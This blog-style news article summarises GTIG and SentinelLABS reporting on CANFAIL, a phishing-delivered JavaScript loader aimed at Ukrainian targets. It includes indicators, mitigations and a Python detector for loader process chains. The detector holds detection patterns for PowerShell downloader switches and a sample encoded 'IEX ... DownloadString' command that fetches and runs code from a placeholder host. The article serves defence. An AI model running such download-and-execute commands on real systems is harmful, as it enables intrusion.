Google Threat Intelligence Group (GTIG) says a previously undocumented threat actor, suspected of being linked to Russian intelligence services, has used phishing to deliver a JavaScript backdoor called CANFAIL against Ukrainian defence, government and energy targets. The attacks used convincing lures and Google Drive links that led victims to a RAR archive containing an obfuscated JavaScript loader. That loader ran a PowerShell downloader, which in turn executed an in-memory dropper.
Below I summarise GTIG’s findings, add technical detail from industry reporting, list defensive steps, and include direct quotations from the official reports.
GTIG found a campaign that used apparently LLM-generated phishing lures and Google Drive links to deliver CANFAIL, an obfuscated JavaScript loader that runs a PowerShell stage and typically ends in a memory-only dropper. The actor targeted Ukrainian defence, military, government and energy organisations and also showed interest in aerospace and manufacturing.
“GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations.”
“Phishing emails sent by the actor contain a lure that based on analysis appears to be LLM-generated, uses formal language and a specific official template, and Google Drive links which host a RAR archive containing CANFAIL malware, often disguised with a .pdf.js double extension.”
Independent analysis and supporting reporting
SentinelOne’s SentinelLABS previously documented a related campaign named PhantomCaptcha that used weaponised PDFs, fake Cloudflare CAPTCHA pages and a WebSocket RAT delivered via ClickFix-style social engineering. SentinelLABS described the final payload in that campaign as a WebSocket RAT that gives remote command execution and exfiltration capabilities. GTIG links the CANFAIL activity to similar social-engineering patterns and infrastructure observed in PhantomCaptcha.
“The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.” SentinelLABS.
Technical breakdown — how the attack chain works
Initial lure: Targeted spearphish. Messages are written in formal, plausible language. GTIG says the text often appears LLM-generated and mimics official templates.
Delivery: A Google Drive link hosts a RAR archive. The archive contains a file with a double extension such as document.pdf.js; Windows hides the final extension by default, so the file looks like a PDF but is a JavaScript loader.
Execution: When the victim opens the file, Windows Script Host (wscript.exe) runs the obfuscated JavaScript, which launches a PowerShell command. That command downloads a second-stage payload, commonly a memory-only PowerShell dropper.
Goal: Establish a remote foothold, run reconnaissance, and enable further payloads or data theft. In the related PhantomCaptcha cases observed by SentinelOne, operators used a WebSocket RAT for remote control and exfiltration.
Key indicators and TTPs
Lures that reference Ukrainian or regional energy organisations.
Google Drive links hosting RAR archives.
Filenames with double extensions like .pdf.js.
Obfuscated JavaScript that spawns PowerShell commands.
Memory-only PowerShell droppers (the dropper itself leaves few or no disk artifacts; the .js loader and PowerShell logs remain the main evidence).
WebSocket connections to recently registered domains or Russian-hosted infrastructure (observed in PhantomCaptcha).
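The attack chain and indicator list above, and the checklist item further down about logging hidden or policy-bypassing PowerShell, translate directly into a host-based detection. The following is an added example, not code from GTIG, SentinelLABS or this article: a small Python detector run over constructed process-creation events whose fields mirror what Sysmon Event ID 1 or Windows Security event 4688 provide (the file names, paths, user name and URL are invented). It flags a script host opening a document-looking double-extension file straight from the WinRAR temporary folder, a PowerShell child of wscript.exe/cscript.exe, hidden-window/bypass/encoded-command switches, and decodes an -EncodedCommand argument so the download cmdlets hidden inside it are matched as well. The switch list and regular expressions are this example's assumptions, not indicators published by GTIG.

```python
import base64
import re
from dataclasses import dataclass

# Windows Script Host binaries that run a double-clicked .js/.vbs loader.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Script extensions the host executes (the real, trailing extension of "document.pdf.js").
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "hta"}
# Document-looking extensions used as the decoy middle part of a double extension.
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf", "jpg", "png"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Assumed (this example's, not GTIG's) switches and cmdlets typical of a hidden,
# policy-bypassing PowerShell downloader stage.
PS_SUSPICIOUS = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass|-nop\b|-noni\b|"
    r"\biex\b|invoke-expression|downloadstring|downloadfile|invoke-webrequest|net\.webclient)",
    re.IGNORECASE,
)
# -e / -ec / -enc / -encodedcommand followed by a base64 blob (UTF-16LE script).
ENC_FLAG = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Bare file name ending in a script extension, anywhere in a command line.
SCRIPT_FILE = re.compile(r'([^\s"\\/]+\.(?:js|jse|vbs|vbe|wsf|hta))\b', re.IGNORECASE)
# WinRAR extracts a double-clicked archive member to %TEMP%\Rar$<id> before opening it.
RAR_TEMP = re.compile(r"\\temp\\rar\$", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    command_line: str


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def double_extension(name):
    """Return (decoy, script) for names like 'Lyst.pdf.js'; None for 'archive.tar.gz'."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) == 3 and parts[2] in SCRIPT_EXTS and parts[1] in DECOY_EXTS:
        return parts[1], parts[2]
    return None


def decode_encoded_command(command_line):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text) or return None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Apply the loader-chain rules to one process-creation event."""
    findings = []
    image, parent, cmd = basename(event.image), basename(event.parent_image), event.command_line

    if image in SCRIPT_HOSTS:
        for name in SCRIPT_FILE.findall(cmd):
            ext = double_extension(name)
            if ext:
                findings.append(Finding("double_extension_loader", f"{name} ({ext[0]} decoy, {ext[1]} script)"))
        if RAR_TEMP.search(cmd):
            findings.append(Finding("script_run_from_rar_temp", "script opened straight out of a RAR archive"))

    if image in POWERSHELL:
        if parent in SCRIPT_HOSTS:
            findings.append(Finding("script_host_spawned_powershell", f"{parent} -> {image}"))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append(Finding("encoded_command", decoded))
        # Match the switches on the raw line and the cmdlets on the decoded script.
        scanned = cmd if decoded is None else f"{cmd} {decoded}"
        hits = sorted({re.sub(r"\s+", " ", m.group(0).lower()) for m in PS_SUSPICIOUS.finditer(scanned)})
        if hits:
            findings.append(Finding("powershell_downloader_flags", ", ".join(hits)))
    return findings


# Constructed sample events (invented paths, user and URL). The second-stage command is
# encoded here the way a loader passes it to powershell.exe -enc.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\wscript.exe", r"C:\Program Files\WinRAR\WinRAR.exe",
                 r'"C:\Windows\System32\WScript.exe" "C:\Users\olena\AppData\Local\Temp\Rar$DIa1234.5678\Lyst_MOU.pdf.js"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\wscript.exe",
                 f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
                 r"powershell.exe -File C:\scripts\nightly-backup.ps1"),
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        for f in analyze(event):
            print(f"[{f.rule}] {basename(event.image)}: {f.detail}")
```

The benign third event produces no findings, which is the point of keying the rules on the parent/child relationship and the double extension rather than on PowerShell alone. In a SIEM the same logic maps onto Sysmon Event ID 1 (Image, ParentImage, CommandLine) or Security 4688 with command-line auditing enabled; without command-line auditing the double-extension and encoded-command rules have nothing to work on.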
Who is being targeted
Primary targets reported by GTIG:
Defence and military organisations in Ukraine.
Government agencies at regional and national level.
Energy companies and utilities.
Secondary interest:
Aerospace firms, manufacturers with drone or defence ties, nuclear and chemical research organisations, and humanitarian organisations involved in Ukraine aid.
Why the actor is notable now
GTIG highlights two important shifts:
The actor appears less resourced than major espionage clusters but compensates by using large language models to craft better lures, automate reconnaissance, and assist in post-compromise tasks.
The campaign uses trusted cloud hosting (Google Drive) and social-engineering techniques that make the lure more convincing and harder to detect at the mail gateway.
Quick risk and mitigation mapping
Each entry below lists the risk observed, why it matters, and the recommended immediate action.

Risk observed: LLM-crafted spearphish (high fidelity)
Why it matters: Higher click rates and lower suspicion
Recommended immediate action: Phishing-resistant MFA (limits credential theft, but does not stop a .js loader from running) and targeted user awareness on “Paste & Run” (ClickFix) techniques

Risk observed: Google Drive / RAR delivery
Why it matters: Trusted cloud hosting increases click-through
Recommended immediate action: Block or scan archive downloads from external cloud links for critical users

Risk observed: .pdf.js double-extension loaders
Why it matters: Hides the actual executable content behind a document-looking name
Recommended immediate action: Enforce extension/association policies (for example, open .js/.jse/.vbs with Notepad rather than Windows Script Host, and show file extensions) and scan for double-extension files

Risk observed: Memory-only PowerShell droppers
Why it matters: Hard to detect with file-only EDR
Recommended immediate action: Enable PowerShell script block and module logging, and use memory and behaviour analytics

Risk observed: WebSocket RATs to obscure C2
Why it matters: Stealthy C2 channels
Recommended immediate action: Monitor WebSocket connections to unknown domains and newly registered hosts
Practical defensive checklist
Enforce multi-factor authentication across all accounts, favouring hardware or phishing-resistant MFA.
Block or better inspect archive files from external cloud file-shares.
Log and alert on PowerShell invocations that run hidden, bypass execution policy or pass an encoded command (for example -WindowStyle Hidden, -ExecutionPolicy Bypass, -EncodedCommand), especially when the parent process is wscript.exe or cscript.exe.
Monitor for WebSocket traffic to unusual domains and for connections to recently registered hosts.
Train staff on “paste and run” social engineering and how to verify official communications.
Apply least privilege to email inboxes and admin resources; review third-party access.
Official Statements
GTIG (Google Cloud blog): “GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations.” Read the full GTIG write-up here.
GTIG (on LLM use): “Phishing emails sent by the actor contain a lure that based on analysis appears to be LLM-generated, … Google Drive links which host a RAR archive containing CANFAIL malware, often disguised with a .pdf.js double extension.” Full context in GTIG’s post.
SentinelLABS (SentinelOne): “The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that enables arbitrary remote command execution, data exfiltration, and potential deployment of additional malware.” Read SentinelLABS’ PhantomCaptcha analysis here.
FAQ
Q: Is CANFAIL a new malware family?
A: CANFAIL is the name GTIG uses for the obfuscated JavaScript loader observed in these campaigns, and GTIG describes the actor delivering it as previously undocumented. Its use alongside in-memory PowerShell droppers, and the similar social engineering seen with WebSocket RATs in PhantomCaptcha, is the pattern noted by GTIG and SentinelLABS.
Q: How are LLMs being used by attackers?
A: GTIG observed adversaries using LLMs to draft high-fidelity phishing lures, gather OSINT, and assist in technical tasks for post-compromise operations.
Q: Should organisations block Google Drive links entirely?
A: Not necessarily. Instead, apply inspection for archives from external sources, sandbox suspicious downloads, and limit file-share privileges for high-risk roles.
Q: Where can I find indicators of compromise (IoCs)?
A: GTIG’s blog post and SentinelLABS’ PhantomCaptcha report include IoCs and hashes. Use those pages to import indicators into your SIEM or threat-hunting tools.
I am a Business Analytics student with a strong interest in publishing well-researched and data-driven news articles. I focus on analyzing trends in business, finance, and technology to create clear, accurate, and engaging content for readers. I enjoy transforming complex data and information into simple, meaningful stories that help audiences understand current developments. With analytical thinking and attention to detail, I aim to deliver credible and insightful news that adds real value to readers.